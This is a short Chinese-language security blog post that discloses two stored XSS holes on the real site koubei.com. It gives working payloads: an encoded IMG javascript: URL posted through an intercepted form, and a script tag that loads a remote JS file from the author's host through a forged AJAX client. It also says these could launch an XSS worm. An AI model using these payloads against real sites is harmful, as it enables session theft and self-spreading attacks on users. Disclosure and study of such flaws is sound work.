口碑网XSS Trap
作者:余弦
来源:0x37 Security
口碑网www.koubei.com,很火的一个WEB2.0信息共享网站。口碑确实不错,不过安全性就不是这样了。刚刚发现的两个XSS Trap,可以轻易爆发XSS WORM。口碑网的XSS Trap肯定不止这两个,其它的就没渗透的必要了:)
XSS Trap ONE:
博客的发表文章处,这个编辑器我估计是漏洞不少,虽然在客户端过滤的不错,但是使用Firefox的Tamper Data插件就轻易绕过。发文章时,Tamper Data截获的部分数据如下:
—————————–2416075422974\r\nContent-Disposition: form-data; name=”subject”\r\n\r\n文章标题在此……\r\n—————————–2416075422974\r\nContent-Disposition: form-data; name=”itemtypeid”\r\n\r\n4293386\r\n—————————–2416075422974\r\nContent-Disposition: form-data; name=”message”\r\n\r\n文章正文在此……\r\n—————————–2416075422974–\r\n
将 “文章正文在此……”替换为:<IMG src=”jav	ascr	ipt:alert(‘XSS’);”>或<IMG SRC=javascr& amp;#x69pt:alert('XSS')> 等等,都可以发生跨站,这里我做了编码处理,可以绕过服务端的过滤。其它的构造自己发散思维了:)。你直接提交是不可能成功滴。
XSS Trap TWO:
个 人信息设置的标题处,客户端有字数的限制,此表单提交时使用了DWR的AJAX模块,即使使用Firefox的Tamper Data或Live HTTP headers等插件都无法充当中间攻击角色,虽然它们确实拦截了HTTP信息包。针对AJAX的攻击手法,还得这样做:http://www.0x37.com/post/21.html, 在本地构造伪客户端来链接远程AJAX模块,并提交我们的信息,于是客户端的字数限制等等都将无用。我提交了这样的数 据:’)”><script src=http://www.0x37.com/Project/koubei.js></script><a>。
当你的js文件能够被目标服务器加载时,那这个XSS WORM还怕诞生不了吗?口碑网有些功能模块发数据时要填写验证码,这样的模块是XSS WORM无法黑入的地方:.(。除非能绕过验证码限制。关于如何Code这样的蠕虫我以前的好些篇文章都有详细说明。
我 现在又有负罪感了……因为再过些天我就要毕业答辩,我的毕业论文还没写好……时间又花在这上面,我只能说:这个不好玩了……我现在最烦的是我的实验没数 据,红外光谱、核磁共振、DSC、黏胶渗透色谱……我一个都没做,可恶!为什么没给我安排上这些过程……开始认真起来,写论文去,转型也不差这点时间……
技术转型……
哈哈。俺的论文快完工了!